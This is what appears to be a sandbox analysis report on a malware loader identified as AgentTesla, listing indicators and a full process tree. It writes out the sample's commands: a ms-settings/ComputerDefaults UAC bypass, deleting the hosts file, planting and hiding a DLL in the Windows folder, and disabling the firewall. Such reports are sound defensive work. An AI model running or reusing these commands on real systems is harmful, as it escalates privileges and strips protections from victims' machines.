Analysis
-
max time kernel
600s -
max time network
569s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
31/08/2024, 16:23
Static task
static1
Behavioral task
behavioral1
Sample
DarkWareLoader.exe
Resource
win10v2004-20240802-en
General
-
Target
DarkWareLoader.exe
-
Size
2.3MB
-
MD5
c42b185841679c16a7aed9ccf48e0d0d
-
SHA1
0c6ad1cc0e6e8706c5913a8604d42449549c4da3
-
SHA256
03bb14890ec3a3cdf397f6af5e87d4cdf122b564a64f89c5b6672e5cbcc57b01
-
SHA512
c8ce057772905b620a9ea1910ce72410d49b327ce5256a6cf594d4a1df17bb3eed4a2b6664988c755b58ec31ee6e76ba87230edeb56c574e3b8bd0ff5c63135f
-
SSDEEP
49152:4CI01yYHlo9MayICF/Xo1U7AZecga2jp:4CIAyYFS8w3UJd
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
AgentTesla payload 1 IoCs
resource yara_rule behavioral1/memory/1276-34-0x0000000006990000-0x0000000006BA2000-memory.dmp family_agenttesla -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation DarkWareLoader.exe -
Executes dropped EXE 3 IoCs
pid Process 2660 concv1.exe 1276 DarkWare.exe 4468 CuteCats.jpeg -
pid Process 3536 powershell.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 28 raw.githubusercontent.com 29 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 61 checkip.amazonaws.com -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 2132 cmd.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4468 CuteCats.jpeg 4468 CuteCats.jpeg -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\ntshrui.dll attrib.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DarkWare.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dllhost.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS DarkWare.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer DarkWare.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion DarkWare.exe -
Modifies registry class 55 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\453136.vbs" reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\50287.vbs" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\160386.vbs" reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\402262.vbs" reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\848859.vbs" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3536 powershell.exe 3536 powershell.exe 3536 powershell.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4468 CuteCats.jpeg 4468 CuteCats.jpeg 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe 4620 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4364 DarkWareLoader.exe Token: SeDebugPrivilege 1276 DarkWare.exe Token: SeDebugPrivilege 3536 powershell.exe Token: SeIncreaseQuotaPrivilege 3536 powershell.exe Token: SeSecurityPrivilege 3536 powershell.exe Token: SeTakeOwnershipPrivilege 3536 powershell.exe Token: SeLoadDriverPrivilege 3536 powershell.exe Token: SeSystemProfilePrivilege 3536 powershell.exe Token: SeSystemtimePrivilege 3536 powershell.exe Token: SeProfSingleProcessPrivilege 3536 powershell.exe Token: SeIncBasePriorityPrivilege 3536 powershell.exe Token: SeCreatePagefilePrivilege 3536 powershell.exe Token: SeBackupPrivilege 3536 powershell.exe Token: SeRestorePrivilege 3536 powershell.exe Token: SeShutdownPrivilege 3536 powershell.exe Token: SeDebugPrivilege 3536 powershell.exe Token: SeSystemEnvironmentPrivilege 3536 powershell.exe Token: SeRemoteShutdownPrivilege 3536 powershell.exe Token: SeUndockPrivilege 3536 powershell.exe Token: SeManageVolumePrivilege 3536 powershell.exe Token: 33 3536 powershell.exe Token: 34 3536 powershell.exe Token: 35 3536 powershell.exe Token: 36 3536 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4620 dllhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4364 wrote to memory of 2660 4364 DarkWareLoader.exe 86 PID 4364 wrote to memory of 2660 4364 DarkWareLoader.exe 86 PID 4364 wrote to memory of 1276 4364 DarkWareLoader.exe 87 PID 4364 wrote to memory of 1276 4364 DarkWareLoader.exe 87 PID 4364 wrote to memory of 1276 4364 DarkWareLoader.exe 87 PID 2660 wrote to memory of 3124 2660 concv1.exe 93 PID 2660 wrote to memory of 3124 2660 concv1.exe 93 PID 3124 wrote to memory of 4880 3124 cmd.exe 95 PID 3124 wrote to memory of 4880 3124 cmd.exe 95 PID 2660 wrote to memory of 3236 2660 concv1.exe 96 PID 2660 wrote to memory of 3236 2660 concv1.exe 96 PID 3236 wrote to memory of 1192 3236 cmd.exe 98 PID 3236 wrote to memory of 1192 3236 cmd.exe 98 PID 3236 wrote to memory of 2348 3236 cmd.exe 99 PID 3236 wrote to memory of 2348 3236 cmd.exe 99 PID 2660 wrote to memory of 2768 2660 concv1.exe 102 PID 2660 wrote to memory of 2768 2660 concv1.exe 102 PID 2768 wrote to memory of 1280 2768 cmd.exe 104 PID 2768 wrote to memory of 1280 2768 cmd.exe 104 PID 1280 wrote to memory of 720 1280 ComputerDefaults.exe 105 PID 1280 wrote to memory of 720 1280 ComputerDefaults.exe 105 PID 720 wrote to memory of 3852 720 wscript.exe 106 PID 720 wrote to memory of 3852 720 wscript.exe 106 PID 2660 wrote to memory of 2300 2660 concv1.exe 108 PID 2660 wrote to memory of 2300 2660 concv1.exe 108 PID 2660 wrote to memory of 4916 2660 concv1.exe 110 PID 2660 wrote to memory of 4916 2660 concv1.exe 110 PID 4916 wrote to memory of 1640 4916 cmd.exe 112 PID 4916 wrote to memory of 1640 4916 cmd.exe 112 PID 2660 wrote to memory of 4620 2660 concv1.exe 116 PID 2660 wrote to memory of 4620 2660 concv1.exe 116 PID 2660 wrote to memory of 4620 2660 concv1.exe 116 PID 2660 wrote to memory of 4620 2660 concv1.exe 116 PID 2660 wrote to memory of 4620 2660 concv1.exe 116 PID 2660 wrote to memory of 4620 2660 concv1.exe 116 PID 2660 wrote to memory of 4620 2660 concv1.exe 116 PID 2660 wrote to memory of 4620 2660 concv1.exe 116 PID 2660 wrote to memory of 4620 2660 concv1.exe 116 PID 2660 wrote to memory of 4620 2660 concv1.exe 116 PID 2660 wrote to memory of 4620 2660 concv1.exe 116 PID 4620 wrote to memory of 2320 4620 dllhost.exe 117 PID 4620 wrote to memory of 2320 4620 dllhost.exe 117 PID 2320 wrote to memory of 1684 2320 cmd.exe 119 PID 2320 wrote to memory of 1684 2320 cmd.exe 119 PID 4620 wrote to memory of 4344 4620 dllhost.exe 120 PID 4620 wrote to memory of 4344 4620 dllhost.exe 120 PID 4344 wrote to memory of 5072 4344 cmd.exe 122 PID 4344 wrote to memory of 5072 4344 cmd.exe 122 PID 4344 wrote to memory of 4020 4344 cmd.exe 123 PID 4344 wrote to memory of 4020 4344 cmd.exe 123 PID 4620 wrote to memory of 404 4620 dllhost.exe 124 PID 4620 wrote to memory of 404 4620 dllhost.exe 124 PID 404 wrote to memory of 3532 404 cmd.exe 126 PID 404 wrote to memory of 3532 404 cmd.exe 126 PID 3532 wrote to memory of 2768 3532 ComputerDefaults.exe 127 PID 3532 wrote to memory of 2768 3532 ComputerDefaults.exe 127 PID 2768 wrote to memory of 1452 2768 wscript.exe 128 PID 2768 wrote to memory of 1452 2768 wscript.exe 128 PID 4620 wrote to memory of 5076 4620 dllhost.exe 130 PID 4620 wrote to memory of 5076 4620 dllhost.exe 130 PID 4620 wrote to memory of 860 4620 dllhost.exe 132 PID 4620 wrote to memory of 860 4620 dllhost.exe 132 PID 860 wrote to memory of 1552 860 cmd.exe 134 PID 860 wrote to memory of 1552 860 cmd.exe 134 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2532 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\DarkWareLoader.exe"C:\Users\Admin\AppData\Local\Temp\DarkWareLoader.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Users\Admin\AppData\Local\Temp\concv1.exe"C:\Users\Admin\AppData\Local\Temp\concv1.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:4880
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\402262.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f3⤵
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\402262.vbs" /f4⤵
- Modifies registry class
PID:1192
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Modifies registry class
PID:2348
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1280 -
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\402262.vbs5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:720 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts6⤵PID:3852
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\402262.vbs3⤵PID:2300
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Modifies registry class
PID:1640
-
-
-
C:\Windows\System32\dllhost.exe"C:\Windows\System32\dllhost.exe"3⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:1684
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\160386.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\160386.vbs" /f5⤵
- Modifies registry class
PID:5072
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:4020
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\160386.vbs6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c move "C:\Users\Admin\AppData\Local\Temp\3231430.tmp" "C:\Windows\ntshrui.dll"7⤵PID:1452
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\160386.vbs4⤵PID:5076
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:1552
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:1748
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:4532
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\848859.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵PID:1808
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\848859.vbs" /f5⤵
- Modifies registry class
PID:3320
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:3464
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵PID:1976
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:4256
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\848859.vbs6⤵
- Checks computer location settings
PID:1992 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C attrib +h "C:\Windows\ntshrui.dll"7⤵
- Hide Artifacts: Hidden Files and Directories
PID:2132 -
C:\Windows\system32\attrib.exeattrib +h "C:\Windows\ntshrui.dll"8⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2532
-
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\848859.vbs4⤵PID:1512
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:3700
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:4572
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:1192
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:3780
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\453136.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵PID:3504
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\453136.vbs" /f5⤵
- Modifies registry class
PID:488
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:1452
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵PID:1184
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:2460
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\453136.vbs6⤵
- Checks computer location settings
PID:4708 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Privacy\LetAppsAccessLocation\ /f /v Value /t REG_DWORD /d 0 >nul7⤵PID:436
-
C:\Windows\system32\reg.exeREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Privacy\LetAppsAccessLocation\ /f /v Value /t REG_DWORD /d 08⤵PID:4532
-
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\453136.vbs4⤵PID:4396
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:3320
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:3580
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:4980
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:2092
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\50287.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵PID:864
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\50287.vbs" /f5⤵
- Modifies registry class
PID:3216
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:4720
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵PID:4704
-
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵PID:1512
-
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\50287.vbs6⤵
- Checks computer location settings
PID:4804 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C powershell Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False7⤵PID:3428
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3536
-
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\50287.vbs4⤵PID:3048
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:4132
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:2060
-
-
-
